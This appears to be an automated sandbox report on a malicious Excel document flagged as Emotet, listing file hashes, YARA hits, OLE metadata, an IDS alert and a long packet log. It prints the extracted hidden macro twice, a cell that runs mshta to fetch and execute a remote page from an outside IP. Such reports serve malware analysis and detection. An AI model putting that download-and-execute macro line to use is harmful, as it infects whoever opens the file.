                                                                                                                                                          MD5:F8B4320DCDF37690102B2F93403BD32C
                                                                                                                                                          SHA1:E21CB5655B3094F322CDAEC4C0F359905F8A7949
                                                                                                                                                          SHA-256:21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                                                                                                                                                          SHA-512:13920D1CF9C9EF7329F402183AAFB8B9709A202326A67A141C9A0AA971DE8EECE9C94B47A9D7132A04B09289CD6F4824987E79ED7FDD97ECD26B8AB876E309C8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: 2022-28-01_1203.xls, Detection: malicious
                                                                                                                                                          Process:C:\Windows\System32\mshta.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):11054
                                                                                                                                                          Entropy (8bit):6.200485074224619
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                                                                                                                                          MD5:DD20B97330028BCB6BF98D97C47028D9
                                                                                                                                                          SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                                                                                                                                          SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                                                                                                                                          SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                                                                                                                                          Malicious:false
                                                                                                                                                          IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1536
                                                                                                                                                          Entropy (8bit):1.1464700112623651
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):28672
                                                                                                                                                          Entropy (8bit):3.5189161831469296
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                                                                                                                                          MD5:06A30014EFAE12913C829BE85DD271EC
                                                                                                                                                          SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                                                                                                                                          SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                                                                                                                                          SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8016
                                                                                                                                                          Entropy (8bit):3.581539251116374
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:chQC4MqeqvsqvJCwosz8hQC4MqeqvsEHyqvJCworazKAY7HXUVXPlUVeA2:cmfosz8mjHnorazK/UVX9A2
                                                                                                                                                          MD5:0EF4DD16FBE577D9E72979EFF742E047
                                                                                                                                                          SHA1:8112CA599FA9F4506D41BC3FCA039DCA637893FE
                                                                                                                                                          SHA-256:20BAD3FDE9D549EC867DA956BB8EA1A26C44A5CA2881ADB9ADD9F61C8D7BBD1A
                                                                                                                                                          SHA-512:DD83B8F20F06E0B4CB5A8BAD77C7FABED7D48EC1C0F7163899D94C15BF53BA9C4E338A8D4BABA430DAE06ADD357B2AF00E3316DAD189755C77896F8AC702941D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86528
                                                                                                                                                          Entropy (8bit):7.100284561770905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3H:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxH
                                                                                                                                                          MD5:B8E083C3F5D575B0F43A4B17C08361BD
                                                                                                                                                          SHA1:B0551FC012F37F0F9F0FFF11DFAD9399E943686E
                                                                                                                                                          SHA-256:59994E52782930FB06FE63D615C7B97A5EC8A08462528053212C6B0F42E6A83D
                                                                                                                                                          SHA-512:B33633E1E7EDCFE936BCC8D5804136525442221D2423F3384967E418B83490FE3B2FB06B04D1A5650CD495FB5996624C2D2556298EC4E989A09BC0B2AB3C2042
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\2022-28-01_1202.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                                          • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\2022-28-01_1202.xls, Author: Joe Security
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):548864
                                                                                                                                                          Entropy (8bit):6.980507701343226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvryMwWd3DYr6i64/:OUBPSczbeeTnvDZDWA
                                                                                                                                                          MD5:F8B4320DCDF37690102B2F93403BD32C
                                                                                                                                                          SHA1:E21CB5655B3094F322CDAEC4C0F359905F8A7949
                                                                                                                                                          SHA-256:21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                                                                                                                                                          SHA-512:13920D1CF9C9EF7329F402183AAFB8B9709A202326A67A141C9A0AA971DE8EECE9C94B47A9D7132A04B09289CD6F4824987E79ED7FDD97ECD26B8AB876E309C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Joe Sandbox View:
• Filename: 2022-28-01_1203.xls, Detection: malicious
                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                                                                                                                                          Entropy (8bit):7.0722277805318345
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                          File name:2022-28-01_1202.xls
                                                                                                                                                          File size:87044
                                                                                                                                                          MD5:e31371453defbbf8840b40b5bff8600a
                                                                                                                                                          SHA1:bf7b00bc9192d147adc9d2fa52c69fe796e55d67
                                                                                                                                                          SHA256:7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
                                                                                                                                                          SHA512:7bae41a270fc60e8b1d824d2c4df91bafe28e7ebea1dec843935e27125e2b41fdb50c290f53b47e4a61f72d0728918365dd0ae12b282897366b44eb05dae7d3e
                                                                                                                                                          SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                                                                                                                                          Icon Hash:e4eea286a4b4bcb4
                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1
                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True
                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:xXx
                                                                                                                                                          Last Saved By:xXx
                                                                                                                                                          Create Time:2022-01-27 23:41:00
                                                                                                                                                          Last Saved Time:2022-01-28 06:31:03
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0
                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Company:
                                                                                                                                                          Contains Dirty Links:False
                                                                                                                                                          Shared Document:False
                                                                                                                                                          Changed Hyperlinks:False
                                                                                                                                                          Application Version:1048576
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.324918127833
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
                                                                                                                                                          Entropy:0.263079431268
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Workbook
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Stream Size:76002
                                                                                                                                                          Entropy:7.62172227998
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Name:REEEEEEEE
                                                                                                                                                          Type:3
                                                                                                                                                          Final:False
                                                                                                                                                          Visible:False
                                                                                                                                                          Protected:False
REEEEEEEE 3 False 0 False post
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
5,2,=HALT()
                                                                                                                                                          Name:REEEEEEEE
                                                                                                                                                          Type:3
                                                                                                                                                          Final:False
                                                                                                                                                          Visible:False
                                                                                                                                                          Protected:False
REEEEEEEE 3 False 0 False pre
2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
5,2,=HALT()
Timestamp:01/29/22-00:14:28.408085
Protocol:TCP
SID:2034631
Message:ET TROJAN Maldoc Activity (set)
Source Port:49166
Dest Port:80
Source IP:192.168.2.22
Dest IP:91.240.118.172
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                                                                                                          Jan 29, 2022 00:14:50.164741993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175324917 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175354958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175368071 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175389051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175405979 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175421953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175437927 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175453901 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175467014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175482035 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.175498009 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.175539017 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.175544024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353693962 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353732109 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353746891 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353760004 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353774071 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353790998 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353809118 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353821993 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353837013 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353866100 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353874922 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353883982 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353897095 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353910923 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353916883 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353916883 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353935003 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353950024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353951931 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353970051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.353975058 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.353982925 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354000092 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354008913 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.354016066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354033947 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.354044914 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.354079008 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532291889 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532332897 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532346010 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532361031 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532373905 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532392025 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532407045 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532422066 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532439947 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532455921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532473087 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532490969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532507896 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532525063 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532537937 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532552958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532568932 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532583952 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532586098 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532604933 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532623053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532627106 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532640934 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532658100 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532670021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532675028 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532692909 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532708883 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532715082 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532727003 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532744884 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532757998 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532762051 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532778978 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532794952 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532809019 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532815933 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532825947 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532841921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532856941 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532860994 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532881021 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532897949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532910109 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532913923 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532915115 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532931089 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532943010 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532948017 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532953024 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.532967091 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.532989025 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711520910 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711582899 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711626053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711663008 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711704969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711752892 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711770058 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711792946 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711802959 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711828947 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711837053 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711875916 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711889982 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711920977 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711961985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.711966991 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.711998940 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712038994 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712049961 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712079048 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712116957 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712130070 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712161064 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712204933 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712217093 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712245941 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712286949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712292910 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:50.712325096 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712363958 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:50.712371111 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072175980 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072201014 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072202921 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072225094 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072247982 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072249889 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072272062 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072295904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072302103 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072320938 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072331905 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.072345972 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.072395086 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250617027 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250663996 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250683069 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250701904 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250725985 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250749111 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250771999 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250794888 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250819921 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250823021 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250839949 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250861883 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250868082 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250869036 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250895977 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250919104 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250941038 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.250942945 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250971079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.250993967 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251008034 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251019001 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251043081 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251065969 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251080036 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251089096 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251111984 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251135111 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251148939 CET4916880192.168.2.22103.206.244.105
                                                                                                                                                          Jan 29, 2022 00:14:51.251158953 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251182079 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251207113 CET8049168103.206.244.105192.168.2.22
                                                                                                                                                          Jan 29, 2022 00:14:51.251220942 CET4916880192.168.2.22103.206.244.105
